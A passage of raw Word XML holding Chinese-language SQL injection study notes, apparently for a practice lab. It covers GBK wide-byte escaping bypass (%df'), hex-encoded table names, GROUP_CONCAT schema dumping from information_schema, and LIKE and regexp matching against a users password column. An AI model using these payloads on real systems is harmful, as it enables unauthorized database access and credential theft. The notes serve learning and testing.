    <w:p w14:paraId="088628B1" w14:textId="02A88180" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%df' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>%bf'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">%df\ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59D90B" w14:textId="6512C812" w:rsidR="000835DA" w:rsidRPr="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l = b"\xdf\\"</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874F3B1" w14:textId="0511726E" w:rsidR="000835DA" w:rsidRPr="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; a = l.decode('gbk'</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC602D" w14:textId="09B58BCB" w:rsidR="000835DA" w:rsidRPr="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>運</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3437C7BB" w14:textId="77777777" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17046161" w14:textId="08F16082" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0%bf%27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同理，为另一个字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0ACA4F" w14:textId="77777777" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3599E6" w14:textId="6D6350B2" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果需要传入值（被引号包裹，可以使用十六进制查询）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611F13C" w14:textId="77777777" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3A636C" w14:textId="3DFB7A62" w:rsidR="000835DA" w:rsidRPr="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>切莫忘记</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>函数和</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>十六进制字符集前需要加</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FD0A1" w14:textId="77777777" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select hex('users');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF125E" w14:textId="53A3A813" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select * from information_schema.tables where table_name=</w:t>
      </w:r>
      <w:r w:rsidRPr="000835DA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>64776768673374723836;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663C1F9" w14:textId="77777777" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD0394D" w14:textId="626CE01F" w:rsidR="00AE011D" w:rsidRDefault="00C27E4C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc159779469"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表进行注入，获取库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="57435F04" w14:textId="1B0A8613" w:rsidR="00C27E4C" w:rsidRDefault="00CD24F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3FEF5" w14:textId="77777777" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT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GROUP_CONCAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DISTINCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> table_name SEPARATOR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> concatenated_schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1E6F3" w14:textId="2E88DF89" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4083F" w14:textId="77777777" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E18ECD4" w14:textId="6270B150" w:rsidR="00AE011D" w:rsidRDefault="00D879AA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子句可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  ||  &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行逻辑值的</w:t>
      </w:r>
      <w:r w:rsidR="00FA4702">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625991A4" w14:textId="77777777" w:rsidR="00002710" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC78699" w14:textId="5C879249" w:rsidR="00002710" w:rsidRDefault="004C56D9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc159779470"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5AC1C104" w14:textId="3F43273A" w:rsidR="00002710" w:rsidRDefault="004C56D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放的位置同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> regexp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置，此时返回也同样是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（类似</w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（类似</w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="0088001C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种操作符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668811D9" w14:textId="48D2FA70" w:rsidR="004C56D9" w:rsidRDefault="004C56D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'r%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>`security`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">.users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A6A18" w14:textId="77777777" w:rsidR="004C56D9" w:rsidRDefault="004C56D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0603C3" w14:textId="2973C286" w:rsidR="00002710" w:rsidRDefault="00C808E9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc159779471"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4ECFB56F" w14:textId="30461D5D" w:rsidR="00C808E9" w:rsidRDefault="00C808E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分表达式放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前，否则会有语法报错。</w:t>
      </w:r>
      <w:r w:rsidR="00070E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以写</w:t>
      </w:r>
      <w:r w:rsidR="00070E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r w:rsidR="00070E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是得放最后。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA5BB7" w14:textId="4351FD70" w:rsidR="00C808E9" w:rsidRDefault="00C808E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
